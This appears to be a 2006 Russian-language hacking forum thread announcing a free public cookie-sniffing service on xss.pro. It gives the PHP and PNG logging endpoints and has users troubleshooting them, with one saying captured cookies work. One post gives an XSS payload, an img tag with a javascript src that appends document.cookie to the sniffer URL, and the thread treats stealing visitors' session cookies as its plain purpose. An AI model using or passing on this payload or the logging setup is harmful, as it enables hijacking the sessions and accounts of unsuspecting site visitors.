Сниффер на xss.pro

Winux · 06.01.2006

У нас открылся свой сниффер!
http://news.xss.pro/hack_tool.gif
Рады известить Вас, что на нашем портале был открыт сниффер. За его открытие мы обязаны Great'у. Сниффер хранит 100 записей.
Есть php и png снифаки. Лог сниффера находится здесь: http://xss.pro/index.php?act=sniff
Передать значение снифаку можно
1) xss.pro/sources/sniff/sniff.php?Тут_Значение - PHP сниффер
2) xss.pro/sources/sniff/sniff.png?Тут_значение - PNG сниффер
Сниффер, ясен пень, бесплатный. В проекте - возможно персональный сниффер для каждого.

Убедительная просьба, не насиловать сниффер впустую. Пусть в логе не будет всяких тестов. Удачного сниффа![New$paN]

Great · 07.01.2006

Ну кулхацеры.... Более 20 пустых запросов.

TIME: 07.01.2006 15:56:33
QUERY:
IP: ***.***.***.***
USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
REFERER:

а фигею... чищу лог.

Убедительная просьба, не насиловать сниффер впустую. Пусть в логе не будет всяких тестов. Удачного сниффа!

Pion · 07.01.2006

Спасибо!

emvader · 14.03.2006

Пардон, но по-моему png-снифф не пашет... ((( ни у себя на локалхосте (через img src), ни на Форуме (через img) нипашет... ((( как быть? :help:

Zik · 16.03.2006

У меня через ИЕ не пашет, опера открывает :/

emvader · 16.03.2006

((( у меня нипашет ни через Оперу, ничерез ИЕ, ни через Огнелис )))

zeromag · 16.03.2006

Всё работет вы чЁ! :bang:

emvader · 17.03.2006

То есть, ты говоришь, что между bb-тегами img в "[" - скобках http://xss.pro/sources/sniff/sniff.png прально отобразится? Или как Img src= http://xss.pro/sources/sniff/sniff.png с тегом "<" ? У меня ни в одном браузере не отображается... и фиг бы с ним, но он даже не скидывает инфу в логи сниффера, ничего, если вкратце говорить, не происходит... и даже, если я просто перейду на http://xss.pro/sources/sniff/sniff.png тоже ничего не произойдёт, разве что напишет, что это типа некорректный рисунок...

Winux · 17.03.2006

Блин. Конечно не произойдет.
Это не для этого сделано, насколько я понял.

emvader · 17.03.2006

Минуточку... как я понимаю... при появлениии или непоявлении некоего рисунка в момент его "увидиния" кукисы увидевшего передаются в лог... разве нет?

Winux · 17.03.2006

emvader
Еслиб это было точно так, то на любой форум его в подпись и куки твои. Я с этим экспериментировал - не вышло. Хотя может косо экспериментировал.

emvader · 17.03.2006

Но в логах появляются реальные кукисы, которые, надо полагать, были получены именно таким путём... я проверял-они рабочие

Может кто-нить поделится опытом? Потому что, например, php-сниффер полностью рабочий...

.to4ka · 29.08.2006

все прально
Лиса не отображает рисунок
вместо рисунка выдает

Изображение “http://xss.pro/sources/sniff/sniff.png” не может быть показано, так как содержит ошибки.

Версия 1.5.0.4

Минус один браузер -

Great · 29.08.2006

.to4ka
хм... исправим

Great · 29.08.2006

Разобрался. Проблемы с апачем. Я к хостеру

system(#036;cmd) · 29.08.2006

блин, лол. Надо делать так:

Код:

<img name=myimg src="javascript:document.myimg.src='http://xss.pro/sources/sniff/sniff.png?'+document.cookie"></img>

Great · 29.08.2006

блин он не пашет, че вы хотите то.

DeBugger · 14.09.2006

Растолкуйте ламеру криворукому, как правильно юзать сниффер?
(Допустимые комбинации, варианты подстановки...)

Great · 14.09.2006

DeBugger
он пока не настроен

DeBugger · 14.09.2006

Не настроен-то не настроен, а вот теорию можно было бы уже обсудить, чтобы потом не шли пустые запросы.

Сниффер на xss.pro

Старожил форума

CPU register

floppy-диск

floppy-диск

HDD-drive

floppy-диск

(L2) cache

floppy-диск

Старожил форума

floppy-диск

Старожил форума

floppy-диск

CD-диск

CPU register

CPU register

RAM

CPU register

HDD-drive

CPU register

HDD-drive